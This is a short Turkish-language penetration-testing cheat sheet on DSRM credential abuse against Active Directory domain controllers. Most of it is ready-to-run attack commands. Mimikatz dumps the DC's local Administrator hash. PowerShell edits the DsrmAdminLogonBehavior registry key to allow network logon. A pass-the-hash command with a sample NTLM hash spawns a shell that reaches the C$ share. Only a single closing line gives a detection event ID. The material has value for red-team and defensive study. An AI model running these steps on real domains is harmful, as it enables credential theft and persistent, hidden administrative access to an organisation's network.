DSRM Kimlik Bilgileri

Her DC içinde bir yerel yönetici hesabı bulunmaktadır. Bu makinede yönetici ayrıcalıklarına sahip olduğunuzda, mimikatz kullanarak yerel Yönetici hash'ini çıkarabilirsiniz. Ardından, bu yerel Yönetici kullanıcısına uzaktan erişim sağlamak için bir kayıt defterini bu parolayı etkinleştirmek için değiştirirsiniz. İlk olarak, DC içindeki yerel Yönetici kullanıcısının hash'ini çıkarmamız gerekiyor:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Ardından, bu hesabın çalışıp çalışmadığını kontrol etmemiz gerekiyor ve kayıt defteri anahtarının değeri "0" ise veya mevcut değilse, "2" olarak ayarlamanız gerekiyor:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Ardından, bir PTH kullanarak C$ içeriğini listeleyebilir veya hatta bir kabuk elde edebilirsiniz. Unutmayın ki PTH için bellekte o karma ile yeni bir powershell oturumu oluştururken, "domain" sadece DC makinesinin adıdır:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Daha fazla bilgi için: https://adsecurity.org/?p=1714 ve https://adsecurity.org/?p=1785

Hafifletme

• Olay Kimliği 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior oluşturma/değiştirme denetimi